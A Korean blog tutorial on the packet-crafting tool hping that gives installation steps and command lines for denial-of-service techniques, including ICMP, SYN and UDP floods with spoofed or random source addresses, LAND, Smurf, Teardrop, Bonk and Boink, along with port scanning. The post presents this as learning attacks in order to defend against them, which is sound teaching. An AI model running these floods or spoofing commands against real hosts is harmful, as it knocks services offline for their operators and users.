본문 바로가기
기술자료/기술운영자료

Hping ( Hacker's Ping ) 사용기법

에이원네트웍스 2016. 3. 21. 10:58

Hping ( Hacker's Ping )

 

 : 패킷을 조작, 생성 가능

  DoS, 스캐닝, Spoofing 기능

 

wget  http://www.hping.org/hping2.0.0-rc3.tar.gz

tar   zxf   hping2.0.0-rc3.tar.gz

 

cd  hping2-rc3

./configure

 

make

make   strip

make   install

 

hping --help  (hping의 매뉴얼)

 

1. Ping of Death

hping --icmp   192.168.5.1

   ( ping 보내는 명령어 )

hping --icmp   192.168.5.1 -d  6500

   ( -d : datasize )

hping --icmp   192.168.5.1 -d  6500 -i  u1000

   ( -i :interval    ,   u1000 : 1000마이크로 세컨드)

hping --icmp   192.168.5.1 -d  6500 -i  u1000 -a 7.7.7.7

   ( -a :spoofing   )

hping --icmp   192.168.5.1  --rand-source

   (--rand-source : 출발지 주소 랜덤화 )

 

2. LAND Attack

hping --icmp   192.168.5.1  -a 192.168.5.1

  ( 출발지 주소를 목적지 주소와 동일하게 만들어 전송 )

 

hping --icmp   192.168.5.1  -a 192.168.5.1 -d  65000  -i u1000

  ( 데이터 크게, 인터벌 짧게는 기본 )

 

3. Smurf Attack

hping --icmp   192.168.5.255  -a 192.168.5.1 

    ( ICMP +Direct Broadcast  + IP Spoofing )

 

4. TCP SYN Flooding Attack

hping  -I  eth1 -S  192.168.5.1  -p 21 -i u1000

  ( -I :interface  , -S: SYN,  -p:port )

 

hping  -I  eth1 -S  192.168.5.1  -p 21 -i u1000 -d 65000  --rand-source

 

5. UDP Flooding Attack

hping --udp  192.168.5.1   -p 139

   ( --udp:udp 패킷 발생 )

hping --udp  192.168.5.1   -p 139 -d 65000 -i u1000 --rand-source

 

6. Tear Drop

 : Offset 값을 조작해서 단편화된 패킷을 재조립하지 못하도록 만드는 공격

 

   hping  --icmp 192.168.5.1   -g  185

   ( -g :offset  )

 

단편화된 패킷을 얼마동안 보관하는지 조회

   sysctl  -a  |grep  ipfrag_time

 

7. Bonk

 : TCP 헤더의 Sequence No를 조작해서 재조립이 안되도록만드는 기법

 

hping  192.168.5.1   -Q

   ( Bonk 기본 옵션 )

 

hping  -S192.168.5.1   -Q   (SYN 활성화)

hping  -A192.168.5.1   -Q   (ACK 활성화)

hping  -P192.168.5.1   -Q   (PSH 활성화)

hping  -R192.168.5.1   -Q   (RST 활성화)

hping  -U192.168.5.1   -Q   (URG 활성화)

hping  -F192.168.5.1   -Q   (FIN 활성화)

 

hping  -SAPUFR192.168.5.1   -Q   (전부 활성화)

 

8. Boink

 : 보안장치가 세번째 패킷까지만 확인하는 허점을 이용,

  세번째까지만 정상적 Seq 번호를 보내고, 네번째부터 조작된 Seq번호를 보내는 공격 기법

hping  -S192.168.5.1   -M  1460

hping  -S192.168.5.1   -M  2920

    ( -M :Seq.no.를 조작하는 옵션 )

 

9. Scanning

 hping  -S  192.168.5.1   -p  ++1

    (1번포트부터 순차적으로 SYN를 보냄 )

 hping  -S  192.168.5.1   -p  80

    ( 80포트만 확인 )

 

**

공격을 위한 공격이 아닌 공격을 배움으로서 방어를 배우셨으면 합니다.
해당 게시물의 무단 불펌을 불허 합니다.

**

'기술자료 > 기술운영자료' 카테고리의 다른 글

Sniffing 이란  (0) 2016.03.21
Smurf Attack 공격 기법  (0) 2016.03.21
DDOS 공격 기법  (0) 2016.03.21
WS-C4500  (0) 2016.03.21
시스코 데스크탑 가상화  (0) 2016.03.21

'기술자료/기술운영자료' Related Articles

티스토리툴바